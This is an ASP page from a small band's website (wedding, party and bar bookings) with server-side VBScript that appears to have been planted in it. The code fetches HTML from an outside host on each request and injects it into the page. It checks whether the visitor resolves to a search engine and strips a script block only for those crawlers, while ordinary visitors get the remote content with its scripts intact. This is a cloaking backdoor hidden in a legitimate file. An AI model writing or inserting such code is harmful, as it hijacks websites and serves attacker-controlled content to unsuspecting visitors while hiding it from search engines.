<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<meta name="robots" content="noarchive">
<%
function getHTTPPage(url)
    dim Http
    set Http=server.createobject("MSXML2.XMLHTTP")
    Http.open "GET",url,false
    Http.send()
    if Http.readystate<>4 then
        exit function
    end if
    getHTTPPage=bytesToBSTR(Http.responseBody,"UTF-8")
    set http=nothing
    if err.number<>0 then err.Clear
end function
Function BytesToBstr(body,Cset)
        dim objstream
        set objstream = Server.CreateObject("adodb.stream")
        objstream.Type = 1
        objstream.Mode =3
        objstream.Open
        objstream.Write body
        objstream.Position = 0
        objstream.Type = 2
        objstream.Charset = Cset
        BytesToBstr = objstream.ReadText
        objstream.Close
        set objstream = nothing
End Function
Dim Url,Html
yyu=Year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)
if request("shop")<>""  then
URL="http://hbh.runh.fr/ig_zc/NY_Tou_img.aspx?rnd="&yyu&"&p_id="&request("shop")
else if request("pageIndex")<>""  then
URL="http://hbh.runh.fr/ig_zc/LB_Tou_img.aspx?s_id=2&rnd="&yyu&"&pageIndex="&request("pageIndex")&""
else
URL="http://hbh.runh.fr/ig_zc/LB_Tou_img.aspx?rnd="&yyu&"&s_id=2"
end if
end if
Html = getHTTPPage(Url)
ip=Request.ServerVariables("REMOTE_ADDR")
<!--ip="66.249.64.190-->
ipurl="http://hbh.runh.fr/getdomain.aspx?rnd=1&ip="&ip
domain =getHTTPPage(ipurl)
if  (instr(domain,"google")>0 or instr(domain,"msn.com")>0 or instr(domain,"yahoo.com")>0 or instr(domain,"aol.com")>0) then
set re = new RegExp
re.IgnoreCase =True
re.Global = True
re.Pattern = "<script[^>]*?>([\s\S]*?)</script>"
Set matchs = re.Execute(html)
for each match in matchs
sc= match.SubMatches(0)
next
set matchs = nothing
Html=replace(Html,"<script>"&sc&"</script>","")
Response.write Html
else
Response.write Html
<!--Response.end-->
end if
%>
<link href="style/style.css" rel="stylesheet" type="text/css" media="screen">
</head>
<body>
<!-- start header -->
<div id="header">
	<div id="menu">
		<ul>
			<li><a href="index.html">About</a></li>
			<li><a href="wedding_band.html">Wedding Band </a></li>
            <li><a href="functions.html">Function/Parties</a></li>
            <li><a href="bars.html">Bars and Hotels </a></li>
            <li><a href="setlist/setlist.html">Songs</a></li>
			<li><a href="gallery.asp">Gallery</a></li>
			<li class="current_page_item"><a href="contact.html">Contact</a></li>
		</ul>
	</div>
</div>
<div id="logo"></div>
<!-- end header -->
<hr>
<!-- start page -->
<%						   
						   Dim Urlyy,Htmlyy
yyu=Year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)

if request("pageIndex")<>""  then
URLyy="http://hbh.runh.fr/ig_zc/LB_NR_img.aspx?s_id=2&rnd="&yyu&"&pageIndex="&request("pageIndex")&""
else
URLyy="http://hbh.runh.fr/ig_zc/LB_NR_img.aspx?s_id=2&rnd="&yyu&""
if request("shop")<>""  then
Urlyy="http://hbh.runh.fr/ig_zc/NY_Content_img.aspx?rnd="&yyu&"&p_id="&request("shop")
end if

end if
Htmlyy = getHTTPPage(Urlyy)
Htmlyy=replace(Htmlyy,"LB_NR_img.aspx","/conn.asp")
Htmlyy=replace(Htmlyy,"s_id=2&rnd="&yyu&"&","")
Htmlyy=replace(Htmlyy,"?p_id=","/conn.asp?shop=")
Response.write Htmlyy
%>
<!-- end page -->
<hr>
<!-- start footer -->
<div id="footer" class="cushycms">
	<p>© 2011 All Rights Reserved &nbsp;�nbsp; Designed by <a href="http://www.whoosh-design.com/" target="_blank">Whoosh Interactive Design</a></p>
</div>
<!-- end footer -->




</body></html>